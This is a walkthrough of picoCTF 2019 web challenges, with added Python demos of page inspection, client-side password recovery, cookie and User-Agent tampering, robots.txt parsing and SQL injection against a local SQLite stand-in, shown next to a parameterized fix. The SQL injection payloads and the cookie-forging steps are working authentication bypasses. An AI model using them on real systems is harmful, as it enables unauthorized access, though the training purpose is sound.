
PICOCTF 2019

!!
IF YOU ARE A BEGINNER, PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all, what matters is the knowledge acquired.

!!

Insp3ct0r

So this first challenge is pretty simple. We get our first hint in the name of the challenge itself, "Insp3ct0r", which tells us that we should inspect the website. As you may know, most browsers have a built-in tool called the "Inspector" (the developer tools)... So basically all we have to do here is look through the HTML, CSS and JS files that the website includes: anything served to the browser, comments included, is readable by whoever is sitting at that browser.

If you want to try it for yourself, don't read any further: press F12 and start "insp3ct1ng" ;)

We can find the first part of the flag in the HTML source.

So we know that there are two other parts somewhere... let's check the included files. As the screenshot shows, there are two CSS files being included, "css.css" and "mycss.css". Let's open them and see what's in there!

Now only JavaScript is left... look, there is only one .js file being included, called myjs.js! How convenient :p
And there is the third part of the flag!
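Here is the same hunt done in code, as an added example that is not part of the original writeup: it parses a page for its stylesheet and script includes, pulls the comments out of each file and stitches "part N/M" fragments back together. The site contents and the flag are constructed for the example and are not the challenge's.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for the challenge site: a page, two stylesheets and a
# script, each hiding one fragment of a made-up flag inside a comment. None
# of this content is from the real challenge.
SITE = {
    "index.html": """<!doctype html>
<html>
<head>
  <link rel="stylesheet" href="css.css">
  <link rel="stylesheet" href="mycss.css">
  <script src="myjs.js"></script>
</head>
<body>
  <h1>Inspect me</h1>
  <!-- part 1/3 of the flag: picoCTF{made_up_ -->
</body>
</html>""",
    "css.css": "body { margin: 0; }",
    "mycss.css": "/* part 2/3 of the flag: ex4mple_ */\nh1 { font-weight: bold; }",
    "myjs.js": "// part 3/3 of the flag: fl4g}\nconsole.log('nothing to see here');",
}

# "part 1/3 of the flag: XXXX" -> ("1", "XXXX")
PART_RE = re.compile(r"[Pp]art\s*(\d+)\s*/\s*\d+[^:]*:\s*(\S+)")


class IncludeCollector(HTMLParser):
    """Records every stylesheet href and script src, plus all HTML comments."""

    def __init__(self):
        super().__init__()
        self.includes = []
        self.comments = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and a.get("rel") == "stylesheet" and a.get("href"):
            self.includes.append(a["href"])
        elif tag == "script" and a.get("src"):
            self.includes.append(a["src"])

    def handle_comment(self, data):
        self.comments.append(data)


def list_includes(html):
    """Return the external CSS/JS files a page pulls in, in document order."""
    collector = IncludeCollector()
    collector.feed(html)
    return collector.includes


def comments_in(text, kind):
    """Comment bodies of a CSS (/* */) or JS (/* */ and //) file.
    Regex is good enough for a CTF page; it does not know about '//' inside strings."""
    found = re.findall(r"/\*(.*?)\*/", text, re.S)
    if kind == "js":
        found += re.findall(r"//(.*)", text)
    return found


def find_flag(site, entry="index.html"):
    """Walk the page and its includes, pull 'part N/M: ...' fragments out of
    comments and stitch them together in numerical order."""
    collector = IncludeCollector()
    collector.feed(site[entry])
    comments = list(collector.comments)
    for path in collector.includes:
        kind = "css" if path.endswith(".css") else "js"
        comments += comments_in(site[path], kind)
    parts = {}
    for comment in comments:
        for number, fragment in PART_RE.findall(comment):
            parts[int(number)] = fragment
    return "".join(parts[n] for n in sorted(parts))


if __name__ == "__main__":
    print(list_includes(SITE["index.html"]))
    print(find_flag(SITE))
```

Against a live site you would replace the SITE dictionary with the fetched bodies of the page and each include; the parsing and stitching stay the same.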


dont-use-client-side

This is a funny one! Okay so... we've got what seems to be a "secure login portal". If we inspect the form, we can see that it is POSTing to the page itself, and the page is plain HTML with nothing server-side to receive it... what does that mean? It means the password check has to be happening in JavaScript, in our own browser... Let's inspect the page's source code.

Alright, we found this piece of JS code

We can see on line 11 that it grabs our input and then compares slices of it, piece by piece, in a chain of nested ifs. The checks are not in order, so all we have to do is sort them by their substring offsets, from substring(0, split) up to substring(split*7, split*8) (with split = 4 that is 8 pieces covering positions 0 to 32), and concatenate the strings they are compared against. The password never left the page: it was shipped to us along with the code that checks it.
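The reordering done in code, as an added example rather than anything from the writeup: it pulls every `substring(start, end) == '...'` check out of a verify() function, evaluates the `split*N` offsets and concatenates the literals in offset order. The verify() source and the flag below are constructed for the example; only the shape (a `split` variable and scrambled slice comparisons) follows the challenge.

```python
import re

# Constructed verify() in the shape of the challenge's client-side check:
# the slice comparisons are deliberately scrambled and the flag is made up.
# This is not the challenge's real script.
VERIFY_SRC = r"""
function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(0, split) == 'pico') {
      if (checkpass.substring(split*6, split*7) == 'fl4g') {
        if (checkpass.substring(split, split*2) == 'CTF{') {
          if (checkpass.substring(split*4, split*5) == 'ex4m') {
            if (checkpass.substring(split*3, split*4) == '_up_') {
              if (checkpass.substring(split*5, split*6) == 'ple_') {
                if (checkpass.substring(split*7, split*8) == '_00}') {
                  if (checkpass.substring(split*2, split*3) == 'made') {
                    alert("Password Verified")
                  }
                }
              }
            }
          }
        }
      }
    }
    else {
      alert("Incorrect password");
    }
}
"""

# "split = 4;" and every "substring(<start>, <end>) == '<literal>'"
SPLIT_RE = re.compile(r"\bsplit\s*=\s*(\d+)")
CHECK_RE = re.compile(r"substring\(\s*([^,]+?)\s*,\s*([^)]+?)\s*\)\s*==\s*'([^']*)'")


def offset(expr, split):
    """Evaluate the tiny expression language the checks use: N, split, or split*N."""
    expr = expr.replace(" ", "")
    if expr == "split":
        return split
    if expr.startswith("split*"):
        return split * int(expr[len("split*"):])
    return int(expr)


def reassemble(src):
    """Order the substring checks by their start offset and concatenate the
    literals they compare against; that is the only string verify() accepts."""
    split = int(SPLIT_RE.search(src).group(1))
    pieces = []
    for start, end, literal in CHECK_RE.findall(src):
        s, e = offset(start, split), offset(end, split)
        if e - s != len(literal):
            raise ValueError(f"slice {s}:{e} cannot equal {literal!r}")
        pieces.append((s, literal))
    pieces.sort()
    # The slices must tile the string with no gaps or overlaps.
    pos = 0
    for s, literal in pieces:
        if s != pos:
            raise ValueError(f"gap or overlap at offset {pos}")
        pos += len(literal)
    return "".join(literal for _, literal in pieces)


if __name__ == "__main__":
    print(reassemble(VERIFY_SRC))
```

Paste the real verify() source into VERIFY_SRC and the same function recovers the real password; the two sanity checks catch a mis-read slice before you submit a wrong guess.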


logon

This being the third web challenge, we can't expect it to be as easy as the second one, right? So this time we've got a login system. If we press "Sign In" without adding any input, it says that we are logged in (somehow) but we are not able to see the flag... so this has to be a cookie challenge: the server remembers who we are in something the browser sends back with every request, and the browser is ours to control. (Not sure how cookies work? Learn more here.)

There are two ways to solve this... you could either use the developer tools (which are included in most browsers) to edit the HTTP requests, or you could use a tool like Burp Suite. (If you don't know how to use Burp Suite, you should watch this tutorial.)

Using the dev tools is pretty simple... Go to the Network tab, and you should see a GET request to "flag" listed, just like shown below.
Click on it and, on the right side, you should have a button saying "Edit and Resend"; click on it. Look for the cookie called, surprisingly, "admin" and change it from "False" to "True". After that click the small "Send" button. You should now have a new request on the list; click it, go to the Response tab, scroll a little and you should find the flag there! The lesson: a yes/no value the server reads back out of the client's own cookie is not an authorization check.


where are the robots

This is a challenge to test your overall knowledge of websites.
The name of the challenge already gives the solution away. Here is some knowledge that might help you solve it before I spoil it for you.

"Web Robots (also known as Web Wanderers, Crawlers, or Spiders), are programs that traverse the Web automatically. Search engines such as Google use them to index the web content, spammers use them to scan for email addresses, and they have many other uses."
So... basically, it's common to have a "robots.txt" file at the root of a domain, telling crawlers which paths to stay away from, which is exactly a list of the paths a CTF player wants to look at... Let's check if there is such a file on this website.

Seems like there is! Let's try opening it!
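For completeness, here is a small robots.txt parser, added as an example and not part of the original writeup, that lists every path the file asks crawlers to avoid; those are the paths to visit by hand. The robots.txt body is constructed for the example and the paths in it are made up, not the challenge's.

```python
# Constructed robots.txt in the usual shape of such a file. The paths are made
# up for this example and are not the challenge's.
ROBOTS_TXT = """\
# robots.txt for a constructed example site
User-agent: *
Disallow: /cgi-bin/
Disallow: /hidden-example.html   # the interesting one
Allow: /public/

User-agent: Googlebot
Disallow: /private/
"""


def parse_robots(text):
    """Parse a robots.txt body into {user_agent: {"disallow": [...], "allow": [...]}}.
    Consecutive User-agent lines share the rule block that follows them; a
    User-agent line after rules starts a new block."""
    groups, agents, in_rules = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if in_rules:
                agents, in_rules = [], False
            agents.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
        elif field in ("disallow", "allow") and value:
            in_rules = True
            for agent in agents:
                groups[agent][field].append(value)
    return groups


def hidden_paths(text):
    """Every path the file asks crawlers to stay away from, deduplicated, in
    file order: the first places to visit by hand."""
    paths = []
    for rules in parse_robots(text).values():
        for path in rules["disallow"]:
            if path not in paths:
                paths.append(path)
    return paths


if __name__ == "__main__":
    print(hidden_paths(ROBOTS_TXT))
```

Note that robots.txt is advisory: it only asks polite crawlers to stay out, it does not stop anyone from requesting the listed paths directly.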


client-side again

So... it looks like we have an upgraded version of "dont-use-client-side". As we inspect the page, we notice a huge string inside a script tag.
Basically, this is a thing called obfuscation (learn more here). It makes the code harder to read, but it doesn't change what a client-side check is: everything the check needs, the flag pieces included, still has to be shipped to the browser. If we look closely, we don't even have to de-obfuscate it... look at all these pieces of the flag here ;)


open to admins

Before we even get to the challenge itself, we are given this information:

"This secure website allows users to access the flag only if they are admin and if the time is exactly 1400."
Well... this should be easy... Let's intercept the request as we press the big green flag button.
We have to set the admin cookie to True. Let's also add a Time=1400 cookie, just like they told us. Both values are read straight out of the request we send, so both are ours to set.


Nice! We got the flag!


picobrowser

We are presented with another big green button, let's click it to see what happens.
Alright, we got the following message:

You're not picobrowser! Mozilla/5.0 *********
Well... how do they know I am using Mozilla and not picobrowser? If you've studied HTTP headers, you will know the one that carries your browser's identification: User-Agent. Every request includes it, and nothing stops a client from putting whatever it likes in it.
Let's intercept the HTTP request as we click on the button and tell them that we are picobrowser instead of Mozilla.
And there we go! We got the flag!
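The three header-tampering challenges (logon, open to admins, picobrowser) all come down to editing the raw request text before it goes out. As an added example that is not part of the writeup, the code below builds a GET request exactly as it appears in "Edit and Resend" or a Burp Repeater tab, and a constructed stand-in for the servers applies each challenge's check to it, so you can see the default request and the edited one side by side. The host, paths, flag and exact cookie names are assumptions made for the example; only the checks themselves follow what the writeup describes.

```python
import io
from http.client import parse_headers
from http.cookies import SimpleCookie

# Constructed stand-in for the three challenge servers. It reproduces only the
# checks the writeup describes (an "admin" cookie, an extra "Time" cookie, the
# User-Agent string); the paths, host, flag and exact cookie names are
# assumptions for this example, not the real instances.
FLAG = "picoCTF{made_up_flag}"
DENIED = "Not allowed"


def build_request(path, headers):
    """Serialize a GET the way a browser (or Burp's Repeater) puts it on the wire.
    Editing a request in the dev tools is editing exactly this text."""
    lines = [f"GET {path} HTTP/1.1", "Host: challenge.example"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def handle_request(raw):
    """Server side: parse the raw request and apply the challenge's (weak) check.
    Returns the response body."""
    stream = io.BytesIO(raw)
    method, path, _version = stream.readline().decode().strip().split(" ", 2)
    headers = parse_headers(stream)  # reads header lines up to the blank line

    cookies = SimpleCookie(headers.get("Cookie", ""))
    admin = cookies["admin"].value if "admin" in cookies else ""
    clock = cookies["Time"].value if "Time" in cookies else ""
    agent = headers.get("User-Agent", "")

    if method != "GET":
        return DENIED
    if path == "/flag":             # logon: trusts a client-held "admin" flag
        allowed = admin == "True"
    elif path == "/admin":          # open to admins: admin AND "exactly 1400"
        allowed = admin == "True" and clock == "1400"
    elif path == "/picobrowser":    # picobrowser: trusts whatever User-Agent says
        allowed = agent == "picobrowser"
    else:
        return "404 Not Found"
    return FLAG if allowed else DENIED


def demo():
    """Default browser request next to the edited one, for each challenge."""
    cases = {
        "logon_default":  ("/flag", {"Cookie": "admin=False"}),
        "logon_tampered": ("/flag", {"Cookie": "admin=True"}),
        "admin_no_time":  ("/admin", {"Cookie": "admin=True"}),
        "admin_tampered": ("/admin", {"Cookie": "admin=True; Time=1400"}),
        "ua_default":     ("/picobrowser", {"User-Agent": "Mozilla/5.0"}),
        "ua_tampered":    ("/picobrowser", {"User-Agent": "picobrowser"}),
    }
    return {name: handle_request(build_request(path, hdrs))
            for name, (path, hdrs) in cases.items()}


if __name__ == "__main__":
    print(build_request("/flag", {"Cookie": "admin=True"}).decode())
    for name, body in demo().items():
        print(f"{name:16} -> {body}")
```

The point the three challenges share is visible in handle_request: every value it decides on (cookie, cookie, header) arrives in the request, and the request is authored by the client. A real server has to keep the admin decision in state the client cannot write, such as a signed session.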


Irish-Name-Repo 1

In this challenge we are finally introduced to SQL injection. As you surf through the site you will come across a login page (login.php). If you enter dummy data it returns "login failed", which tells us that there is in fact a validation happening. Let's intercept the HTTP request just like we did in the previous challenge.
Okay... interesting... there is a "debug" field being submitted... What happens if we replace the "0" with "1"?

Look! The query is exposed!

As you might know... the login will only be successful if the query returns a row, in other words if its WHERE condition is true for some user. If we don't know the correct credentials, how are we able to make it return true?
Well... this is where SQL injection comes in: our input is pasted straight into the query text, so it can change the query's logic, not just its data. What would happen if we input something like ' or 1=1 as our "pass"? (Don't forget to change debug to 1.) Try it yourself.

Whoa... why didn't it work, you wonder... If you look carefully at the query itself, the syntax isn't right: our leading ' closed the password string, but the query's own closing ' is now left dangling at the end, which gives an unterminated string and an internal error. So now we just have to "play around" with our payload until it fits the syntax... which in this case would be something like ' or '1'='1, where the query's own trailing ' closes our last literal. And voilà! We got the flag!

Irish-Name-Repo 2

So... we've got an upgraded version of the previous challenge. If we try the same payload, it says "SQLi Detected".
This is the part where we have to figure out how they are filtering our input. A blacklist is only as good as its coverage: it seems that they are filtering the password input and completely forgot about the username, which goes into the very same query.
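Both Irish-Name-Repo challenges are reproduced below in miniature, as an added example that is not part of the writeup: an in-memory SQLite database, the string-built query the debug output exposed, the unbalanced and balanced payloads from Repo 1, a filter that only inspects the password as Repo 2 is described, and a parameterized version of the same login for contrast. The database contents, the exact filter rule and the comment-terminated username payload (closing the quote and using `-- ` to discard the password clause) are this example's assumptions; the writeup itself stops before showing the Repo 2 payload.

```python
import sqlite3

# Constructed stand-in for the challenge's login.php: an in-memory SQLite
# database with one made-up account. Only the query shape the writeup's
# debug output shows is reproduced; the filter in login_v2 and the
# comment-terminated username payload in demo() are this example's
# assumptions, not something the writeup states.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'made_up_password')")
    return db


def build_query(username, password):
    """Vulnerable: user input is spliced straight into the SQL text."""
    return (f"SELECT username FROM users "
            f"WHERE username='{username}' AND password='{password}'")


def login_v1(db, username, password):
    """Irish-Name-Repo 1: no filtering at all."""
    query = build_query(username, password)
    try:
        row = db.execute(query).fetchone()
    except sqlite3.OperationalError as exc:   # e.g. an unterminated quote
        return f"Internal error: {exc}"
    return "Login successful" if row else "Login failed"


def login_v2(db, username, password):
    """Irish-Name-Repo 2 as the writeup describes it: a blacklist that only
    looks at the password field (assumed rule: any quote is rejected)."""
    if "'" in password:
        return "SQLi Detected"
    return login_v1(db, username, password)


def login_fixed(db, username, password):
    """Parameterized query: the input can never become SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return "Login successful" if row else "Login failed"


def demo():
    db = make_db()
    return {
        # Repo 1: the first attempt leaves the query's own closing quote dangling
        "v1_unbalanced": login_v1(db, "admin", "' or 1=1"),
        # Repo 1: let the query's trailing quote close our last literal instead
        "v1_balanced": login_v1(db, "admin", "' or '1'='1"),
        # Repo 2: the same payload in the password field trips the filter
        "v2_password": login_v2(db, "admin", "' or '1'='1"),
        # Repo 2: the username is never checked; close the quote and comment
        # out the rest of the statement ("-- "), so the password is never tested
        "v2_username": login_v2(db, "admin' -- ", "anything"),
        # Fixed: both payloads are just strings that match no account
        "fixed_username": login_fixed(db, "admin' -- ", "anything"),
        "fixed_password": login_fixed(db, "admin", "' or '1'='1"),
    }


if __name__ == "__main__":
    print(build_query("admin", "' or 1=1"))   # the query with the dangling quote
    for name, result in demo().items():
        print(f"{name:15} -> {result}")
```

Printing build_query for the first payload shows the same thing the debug=1 page showed: a lone ' at the very end of the statement. The fix is not a better blacklist but login_fixed, where the driver sends the values separately from the SQL text.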


More Coming Soon...